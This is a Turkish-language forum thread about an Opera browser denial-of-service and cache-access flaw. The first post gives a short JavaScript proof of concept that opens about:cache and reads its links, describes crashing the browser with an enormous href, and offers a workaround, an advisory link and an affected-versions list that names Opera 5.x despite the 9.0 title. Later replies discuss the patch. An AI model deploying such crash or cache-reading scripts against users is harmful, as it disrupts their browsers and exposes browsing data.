Opera 9.0 Ddos Açığı

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Fistandantilus
    Fistandantilus's avatar
    Kayıt Tarihi: 28/Eylül/2004
    Erkek
    Açık hafızayı kastırcak bir a href tagının opera'da açılmasıyla gerçekleşiyor. Bilgisayarı zorluyor, canını yakıyor, ağlatıyor... :)



    Örnek Georgi Guninski tarafından sağlanmış:

    -----------------------------------
    a=window.open('about :cache');
    function f()
    {
    xx=a.document.links[2];
    alert('hi='+xx);
    }
    setTimeout('f()',5000);
    -----------------------------------

    Bir başka örnek:
    A href taglaır arasına onlarca http://www.aaa....(a'lar binlerce fln olcak) yazarsanız da uçuruyor)


    Geçici çözüm:
    Browser`ın özelliklerinde JavaScript çalıştırmayı kapatın.
    Ek olarak 'Use cookies to trace password protected documents' seçeneğini aktif edin.
    Henüz üretici firma tarafından sağlanan bir yama çıkmadı.

    ref: http://www.securityfocus.com/bid/3553

    Etkilenen Sistemler

    Etkilenenler:
    Opera Software Opera Web Browser 5.02 win32
    - Microsoft Windows 95
    - Microsoft Windows 98
    - Microsoft Windows 2000
    - Microsoft Windows NT 4.0
    Opera Software Opera Web Browser 5.0 Linux
    Opera Software Opera Web Browser 5.11 win32
    - Microsoft Windows 95
    - Microsoft Windows 98
    - Microsoft Windows 2000
    - Microsoft Windows NT 4.0
    Opera Software Opera Web Browser 5.10 win32
    - Microsoft Windows 95
    - Microsoft Windows 98
    - Microsoft Windows 2000
    - Microsoft Windows NT 4.0
    Opera Software Opera Web Browser 5.12 win32
    - Microsoft Windows 95
    - Microsoft Windows 98
    - Microsoft Windows 98se
    - Microsoft Windows 98SP1
    - Microsoft Windows ME
    - Microsoft Windows XP
    - Microsoft Windows 2000 SP1
    - Microsoft Windows 2000 SP2
    - Microsoft Windows 2000 SP3
    - Microsoft Windows NT 4.0
    - Microsoft Windows NT 4.0SP1
    - Microsoft Windows NT 4.0SP2
    - Microsoft Windows NT 4.0SP3
    - Microsoft Windows NT 4.0SP4
    - Microsoft Windows NT 4.0SP5
    - Microsoft Windows NT 4.0SP6a

    Fakat söyleyin kardeşlerim; insanlığın bir ereği eksikse, eksik değil midir- bizzat kendisi de?
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    kozanaybar
    kozanaybar's avatar
    Kayıt Tarihi: 11/Kasım/2005
    Homo
    Vay a.q ben böyle basit şeyleri niye denemiom ki. Bi gün ben de bulcam operada açık hepiniz morarcaksınız :P (bu arada hakkaten basit bi açık)
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    tagext
    tagext's avatar
    Üstün Hizmet Madalyası Başarı Madalyası
    Kayıt Tarihi: 25/Temmuz/2002
    Erkek
    9,01 sürümü ile bu açığı 2-3 gün evvel kapadılar

    ftw
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    ~$
    ComputerWolf
    ComputerWolf's avatar
    Üstün Hizmet Madalyası
    Kayıt Tarihi: 26/Mart/2003
    Erkek
    Secuirty focus mail liste kayitliyim maili gecmislerdi zaten opera tam hatirlamiyorum ama ya bugun yada dun aksam acitigimda update uyarisi vermisti guncellestirdim bugunde mailde okumustum haberi...sagolasin fistan...

    Hep denedin. Hep yenildin. Olsun yine dene , yine yenil ama daha iyi yenil !
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Fistandantilus
    Fistandantilus's avatar
    Kayıt Tarihi: 28/Eylül/2004
    Erkek
    tuh bea güncelleştirme çıkarmışlar. Ne demek görevimiz.

    Fakat söyleyin kardeşlerim; insanlığın bir ereği eksikse, eksik değil midir- bizzat kendisi de?
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    VisualBoy
    VisualBoy's avatar
    Kayıt Tarihi: 29/Mayıs/2004
    Erkek
    opera ; mozilla ve ie gibi çok gündemde olmadıgı için açıgı olsa dahi kimse nin açık bulmak için ugrasacagını asnmıyorum.

    HolyOne'a ulasinca, bildirecegim...
  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    ~$
    ComputerWolf
    ComputerWolf's avatar
    Üstün Hizmet Madalyası
    Kayıt Tarihi: 26/Mart/2003
    Erkek
    Vİsual Boy .opera kullananlarin sayisi oldukca fazla.....ie de bulunan bir acigin yamalanmasi 2ay surerken operada 2 gun suruyor :=)

    Hep denedin. Hep yenildin. Olsun yine dene , yine yenil ama daha iyi yenil !
  8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    a4tech
    a4tech's avatar
    Kayıt Tarihi: 21/Temmuz/2005
    Erkek
    @Alej: Linux'un yapısı gereği bir uygulama kastırınca sadece o uygulamayı etkiler, sistemi etkilemez. Linux"ta sistem kilitlenmez uygulama kilitlenir.
  9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    vutkubay
    vutkubay's avatar
    Kayıt Tarihi: 13/Haziran/2004
    Erkek
    alemin kralıdır opera..Ustune laf yok..İste tahribatta sorun cıkarıor buraya ie ile girmek zorunda kalıyoruz...

    Gece 12 den sonra, tüm içkiler şaraptır.
Toplam Hit: 12213 Toplam Mesaj: 9